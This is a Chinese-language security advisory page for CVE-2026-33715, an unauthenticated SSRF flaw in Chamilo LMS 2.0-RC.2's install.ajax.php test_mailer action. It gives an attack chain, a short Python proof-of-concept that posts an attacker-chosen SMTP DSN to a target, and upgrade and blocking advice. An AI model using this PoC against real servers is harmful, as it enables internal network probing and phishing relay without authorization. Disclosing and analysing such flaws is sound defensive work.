IPBUF安全漏洞报告
English
CVE-2026-33715 CVSS 7.2 高危

CVE-2026-33715 Chamilo LMS SSRF漏洞

披露日期: 2026-04-14

漏洞信息

漏洞编号
CVE-2026-33715
漏洞类型
SSRF
CVSS评分
7.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Chamilo LMS

相关标签

SSRFChamilo LMS未授权访问邮件中继信息泄露

漏洞概述

Chamilo LMS 2.0-RC.2版本存在未授权访问漏洞。由于`install.ajax.php`文件未包含认证检查,攻击者无需登录即可利用`test_mailer`动作。该接口接受任意Symfony Mailer DSN字符串,导致SSRF漏洞。攻击者可借此探测内网服务,或将服务器作为邮件中继发送垃圾邮件,甚至泄露内网拓扑信息。该问题已在2.0.0-RC.3版本修复。

技术细节

该漏洞的根源在于`public/main/inc/ajax/install.ajax.php`文件在系统安装完成后仍然可访问,且未像其他AJAX端点那样引入`global.inc.php`进行身份认证和安装状态检查。具体而言,该文件中的`test_mailer`动作直接从POST请求中获取`mailer_dsn`参数,并将其传递给Symfony Mailer组件以建立SMTP连接。由于缺乏验证,攻击者可以指定恶意的DSN字符串(如指向内网IP地址或恶意SMTP服务器),迫使Chamilo服务器发起连接。这不仅实现了SSRF攻击以扫描内网端口或探测服务,还可以利用服务器的信誉发送钓鱼邮件。此外,SMTP握手过程中的错误响应可能会泄露内网服务的具体版本或网络拓扑结构。

攻击链分析

STEP 1
1. 信息收集
攻击者发现目标使用Chamilo LMS,并识别出版本为2.0-RC.2。
STEP 2
2. 发起未授权请求
攻击者向`public/main/inc/ajax/install.ajax.php`发送POST请求,设置`action=test_mailer`,并在`mailer_dsn`中填入内网目标地址(如`smtp://127.0.0.1:25`)或恶意SMTP服务器地址。
STEP 3
3. 服务端请求伪造 (SSRF)
Chamilo服务器解析DSN并尝试连接攻击者指定的SMTP服务器。如果是内网地址,则实现端口扫描或服务交互。
STEP 4
4. 利用与信息泄露
攻击者利用邮件中继功能发送钓鱼邮件,或根据SMTP错误响应分析内网拓扑结构和服务版本。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-chamilo-instance.com/main/inc/ajax/install.ajax.php" # Attacker controlled SMTP server (for SSRF or Relay) attacker_smtp = "smtp://192.168.1.100:25" # Payload data payload = { "action": "test_mailer", "mailer_dsn": attacker_smtp } try: # Send POST request to trigger the vulnerability response = requests.post(url, data=payload, timeout=10) # Check response if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response body:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Chamilo LMS < 2.0.0-RC.3

防御指南

临时缓解措施
建议立即升级至Chamilo LMS 2.0.0-RC.3或更高版本。如果无法立即升级,应在Web服务器配置中阻断对外部访问`/main/inc/ajax/install.ajax.php`路径的请求,或者通过网络安全组策略严格限制服务器只能向可信的邮件服务器发送SMTP流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表